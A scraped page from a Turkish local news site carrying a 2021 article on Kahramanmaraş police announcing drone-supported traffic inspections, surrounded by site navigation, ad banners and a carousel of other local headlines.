<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/thumb.php?src=https://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html" title="Tarım Kredi Market’in Elbistan Şubesi açılıyor" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/10/tarım-kredi-market-2.jpg" alt="Tarım Kredi Market’in Elbistan Şubesi açılıyor" />
      <div class="caption">Tarım Kredi Market’in Elbistan Şubesi...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html" title="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/10/tesk.jpg" alt="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" />
      <div class="caption">Kahramanmaraş, çift doz aşıda maviye...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html" title="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/10/elbistan-belediyesi-mobil-cozum.jpg" alt="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" />
      <div class="caption">Elbistan Belediyesi, çözümü vatandaşın ayağına...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/balda-gruplar-belli-oldu-h71449.html" title="BAL’da gruplar belli oldu" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/10/elbistanspor-bal.jpg" alt="BAL’da gruplar belli oldu" />
      <div class="caption">BAL’da gruplar belli oldu</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/160-milyon-liralik-res-yatirimina-devlet-tesviki-h71445.html" title="160 milyon liralık RES yatırımına devlet teşviki" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/10/20502.jpg" alt="160 milyon liralık RES yatırımına devlet teşviki" />
      <div class="caption">160 milyon liralık RES yatırımına...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/kentpark-20-tl-gunleri_1.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Drone destekli trafik denetimleri yapılacak</h1>
                <h2 class="lead" itemprop="description"><strong>Kahramanmaraş İl Emniyet Müdürlüğü, 8 Ekim-15 Kasım tarihleri arasında trafiğin yoğun olduğu noktalarda havadan drone denetimlerinin yapılacağını duyurdu.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-10-05 16:57:13" content="2021-10-05T16:57:13+02:00">05 Ekim 2021 Salı 16:57</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" alt="Drone destekli trafik denetimleri yapılacak" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-71450"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">İl Emniyet Müdürlüğü’nden yapılan yazılı açıklamada; denetimlerin trafik düzeni ve güvenliğinin sağlanması amacıyla gerçekleştirileceği anımsatıldı.</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Açıklamada; İlimizde trafiğin yoğun olduğu güzergâhlar ile kavşak konumunda olan kesimlerde, 08 Ekim-15 Kasım 2021 tarihleri arasında tüm günlerde hava araçlarıyla (drone) özel trafik denetimi gerçekleştirilecektir. Havadan yapılacak denetimler; sağ şeritte veya bankette uygunsuz durumda bekleme, Kırmızı Işık İhlali, ağır taşıtların uygunsuz şerit kullanımı, tehlikeli şerit değiştirme-makas atma, hatalı sollama, yakın takip, karayolu üzerinde zorunlu haller dışında duraklamak/park etmek gibi kural ihlali yapan araçlar başta olmak üzere trafik kazalarına sebep olan diğer ihlallerde takip edilecektir” denildi.</span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/jandarma-trafikten-ogrencilere-egitim-semineri-h71453.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/balda-gruplar-belli-oldu-h71449.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/bahcesehir-koleji-ogrencilerini-teknoloji-ile-bulusturuyor-h71448.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/tes-iste-secim-sureci-basladi-2-h71447.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/evinin-onunde-cinayete-kurban-gitti-h71446.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/160-milyon-liralik-res-yatirimina-devlet-tesviki-h71445.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ikinci-doz-asilama-orani-yuzde-644-seviyesinde-h71444.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/meb-den-ogrencilere-yardimci-kaynak-destegi-h71443.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/835-bin-kucuk-esnafa-nefes-aldiracak-duzenleme-tbmmde-gorusulecek-h71442.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kentparkta-20-gunleri-basladi-h71441.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hirsizlik-operasyonunda-5-gozalti-h71440.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/genclik-merkezinden-ingilizce-kursu-h71439.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/mazotta-oldugu-gibi-gubrede-de-fiyatin-yarisi-oraninda-destek-h71438.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/aycekirdegi-tarlasindaki-yangin-sonduruldu-h71437.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/akedas-tuketiciyi-kesintisiz-enerji-ile-bulusturmayi-hedefliyor-h71436.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/11-elbistan-ultramaraton-turkiye-sampiyonasi-sona-erdi-h71432.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/bilsemden-5-ilcenin-anaokulu-ogrencileri-icin-ozel-proje-h71430.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/vadesinde-odenmeyen-taksitler-kredi-limitlerini-de-dusuruyor-h71429.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/takla-atan-dev-kaya-kamyonunun-surucusu-agir-yaralandi-h71427.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kati-atik-entegre-tesisi-ihaleye-cikiyor-h71426.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html" title="Tarım Kredi Market’in Elbistan Şubesi açılıyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/tarim_kredi_marketin_elbistan_subesi_aciliyor_h71454_08f4c.JPG" alt="Tarım Kredi Market’in Elbistan Şubesi açılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tarım Kredi Market’in Elbistan Şubesi açılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/jandarma-trafikten-ogrencilere-egitim-semineri-h71453.html" title="Jandarma Trafik’ten öğrencilere eğitim semineri">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/jandarma_trafikten_ogrencilere_egitim_semineri_h71453_e1ad7.jpg" alt="Jandarma Trafik’ten öğrencilere eğitim semineri" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Jandarma Trafik’ten öğrencilere eğitim semineri</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html" title="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/kahramanmaras_cift_doz_asida_maviye_bir_adim_daha_yaklasti_h71452_73f7c.jpg" alt="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html" title="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/elbistan_belediyesi_cozumu_vatandasin_ayagina_goturecek_h71451_66dd3.jpg" alt="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/drone-destekli-trafik-denetimleri-yapilacak-h71450.html" title="Drone destekli trafik denetimleri yapılacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/drone_destekli_trafik_denetimleri_yapilacak_h71450_6a535.jpg" alt="Drone destekli trafik denetimleri yapılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Drone destekli trafik denetimleri yapılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/balda-gruplar-belli-oldu-h71449.html" title="BAL’da gruplar belli oldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/balda_gruplar_belli_oldu_h71449_6ba94.jpg" alt="BAL’da gruplar belli oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">BAL’da gruplar belli oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/bahcesehir-koleji-ogrencilerini-teknoloji-ile-bulusturuyor-h71448.html" title="Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/bahcesehir_koleji_ogrencilerini_teknoloji_ile_bulusturuyor_h71448_2f191.jpg" alt="Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/tes-iste-secim-sureci-basladi-2-h71447.html" title="Tes-İş’te seçim süreci başladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/tes_iste_secim_sureci_basladi_h71447_d4ef6.jpg" alt="Tes-İş’te seçim süreci başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tes-İş’te seçim süreci başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/evinin-onunde-cinayete-kurban-gitti-h71446.html" title="Evinin önünde cinayete kurban gitti">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/evinin_onunde_cinayete_kurban_gitti_h71446_59008.jpg" alt="Evinin önünde cinayete kurban gitti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Evinin önünde cinayete kurban gitti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/160-milyon-liralik-res-yatirimina-devlet-tesviki-h71445.html" title="160 milyon liralık RES yatırımına devlet teşviki">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/160_milyon_liralik_res_yatirimina_devlet_tesviki_h71445_271dd.jpg" alt="160 milyon liralık RES yatırımına devlet teşviki" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">160 milyon liralık RES yatırımına devlet teşviki</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ikinci-doz-asilama-orani-yuzde-644-seviyesinde-h71444.html" title="İkinci doz aşılama oranı yüzde 64,4 seviyesinde">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/ikinci_doz_asilama_orani_yuzde_644_seviyesinde_h71444_9704c.jpg" alt="İkinci doz aşılama oranı yüzde 64,4 seviyesinde" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İkinci doz aşılama oranı yüzde 64,4 seviyesinde</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/meb-den-ogrencilere-yardimci-kaynak-destegi-h71443.html" title="MEB&#039;den öğrencilere yardımcı kaynak desteği">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/meb_den_ogrencilere_yardimci_kaynak_destegi_h71443_231d0.jpg" alt="MEB&#039;den öğrencilere yardımcı kaynak desteği" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">MEB&#039;den öğrencilere yardımcı kaynak desteği</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/835-bin-kucuk-esnafa-nefes-aldiracak-duzenleme-tbmmde-gorusulecek-h71442.html" title="835 bin küçük esnafa nefes aldıracak düzenleme TBMM’de görüşülecek">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/835_bin_kucuk_esnafa_nefes_aldiracak_duzenleme_tbmmde_gorusulecek_h71442_9cea0.JPG" alt="835 bin küçük esnafa nefes aldıracak düzenleme TBMM’de görüşülecek" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">835 bin küçük esnafa nefes aldıracak düzenleme TBMM’de görüşülecek</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kentparkta-20-gunleri-basladi-h71441.html" title="Kentpark’ta ‘20 Günleri’ başladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/kentparkta_20_gunleri_basladi_h71441_4bea0.jpg" alt="Kentpark’ta ‘20 Günleri’ başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kentpark’ta ‘20 Günleri’ başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hirsizlik-operasyonunda-5-gozalti-h71440.html" title="Hırsızlık operasyonunda 5 gözaltı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/hirsizlik_operasyonunda_5_gozalti_h71440_15e9c.jpg" alt="Hırsızlık operasyonunda 5 gözaltı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hırsızlık operasyonunda 5 gözaltı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/genclik-merkezinden-ingilizce-kursu-h71439.html" title="Gençlik Merkezi’nden İngilizce kursu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/genclik_merkezinden_ingilizce_kursu_h71439_51c56.jpg" alt="Gençlik Merkezi’nden İngilizce kursu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Gençlik Merkezi’nden İngilizce kursu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/mazotta-oldugu-gibi-gubrede-de-fiyatin-yarisi-oraninda-destek-h71438.html" title="‘Mazotta olduğu gibi gübrede de fiyatın yarısı oranında destek verilmeli’">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/mazotta_oldugu_gibi_gubrede_de_fiyatin_yarisi_oraninda_destek_verilmeli_h71438_370b2.jpg" alt="‘Mazotta olduğu gibi gübrede de fiyatın yarısı oranında destek verilmeli’" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">‘Mazotta olduğu gibi gübrede de fiyatın yarısı oranında destek verilmeli’</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/aycekirdegi-tarlasindaki-yangin-sonduruldu-h71437.html" title="Ayçekirdeği tarlasındaki yangın söndürüldü">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/aycekirdegi_tarlasindaki_yangin_sonduruldu_h71437_38beb.jpg" alt="Ayçekirdeği tarlasındaki yangın söndürüldü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ayçekirdeği tarlasındaki yangın söndürüldü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/akedas-tuketiciyi-kesintisiz-enerji-ile-bulusturmayi-hedefliyor-h71436.html" title=" Akedaş tüketiciyi kesintisiz enerji ile buluşturmayı hedefliyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/akedas_tuketiciyi_kesintisiz_enerji_ile_bulusturmayi_hedefliyor_h71436_429d1.jpg" alt=" Akedaş tüketiciyi kesintisiz enerji ile buluşturmayı hedefliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:"> Akedaş tüketiciyi kesintisiz enerji ile buluşturmayı hedefliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/11-elbistan-ultramaraton-turkiye-sampiyonasi-sona-erdi-h71432.html" title="11. Elbistan Ultramaraton Türkiye Şampiyonası sona erdi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/11_elbistan_ultramaraton_turkiye_sampiyonasi_sona_erdi_h71432_3e5b7.jpg" alt="11. Elbistan Ultramaraton Türkiye Şampiyonası sona erdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">11. Elbistan Ultramaraton Türkiye Şampiyonası sona erdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/bilsemden-5-ilcenin-anaokulu-ogrencileri-icin-ozel-proje-h71430.html" title="BİLSEM’den 5 ilçenin anaokulu öğrencileri için özel proje">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/bilsemden_5_ilcenin_anaokulu_ogrencileri_icin_ozel_proje_h71430_81f80.jpg" alt="BİLSEM’den 5 ilçenin anaokulu öğrencileri için özel proje" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">BİLSEM’den 5 ilçenin anaokulu öğrencileri için özel proje</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/vadesinde-odenmeyen-taksitler-kredi-limitlerini-de-dusuruyor-h71429.html" title="Vadesinde ödenmeyen taksitler kredi limitlerini de düşürüyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/vadesinde_odenmeyen_taksitler_kredi_limitlerini_de_dusuruyor_h71429_87f90.jpg" alt="Vadesinde ödenmeyen taksitler kredi limitlerini de düşürüyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Vadesinde ödenmeyen taksitler kredi limitlerini de düşürüyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html" title="Kiraz ağacı ekim ayında çiçek açtı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/kiraz_agaci_ekim_ayinda_cicek_acti_h71428_a553b.jpg" alt="Kiraz ağacı ekim ayında çiçek açtı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kiraz ağacı ekim ayında çiçek açtı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/takla-atan-dev-kaya-kamyonunun-surucusu-agir-yaralandi-h71427.html" title="Takla atan dev kaya kamyonunun sürücüsü ağır yaralandı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/takla_atan_dev_kaya_kamyonunun_surucusu_agir_yaralandi_h71427_d706c.jpg" alt="Takla atan dev kaya kamyonunun sürücüsü ağır yaralandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Takla atan dev kaya kamyonunun sürücüsü ağır yaralandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kati-atik-entegre-tesisi-ihaleye-cikiyor-h71426.html" title="Katı Atık Entegre Tesisi ihaleye çıkıyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/10/kati_atik_entegre_tesisi_ihaleye_cikiyor_h71426_cf893.jpg" alt="Katı Atık Entegre Tesisi ihaleye çıkıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Katı Atık Entegre Tesisi ihaleye çıkıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
